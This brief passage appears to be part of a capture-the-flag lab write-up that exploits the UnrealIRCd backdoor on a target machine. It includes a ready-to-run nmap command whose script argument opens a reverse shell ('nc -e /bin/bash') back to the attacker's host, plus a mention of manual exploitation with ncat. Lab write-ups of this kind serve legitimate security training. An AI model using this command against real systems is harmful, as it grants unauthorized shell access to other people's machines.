Exploitation

Method 1

Set up your nc listener and run the following script on nmap

nmap -p 6697 --script=irc-unrealircd-backdoor --script-args=irc-unrealircd-backdoor.command="nc -e /bin/bash 10.10.14.28 4444"  10.10.10.117
Connection Established!

Method two

We can manually exploit by gaining access to the system with ncat.

We get a response from IRC via ping as shown on the left hand side, vulnerable to command execution

Last updated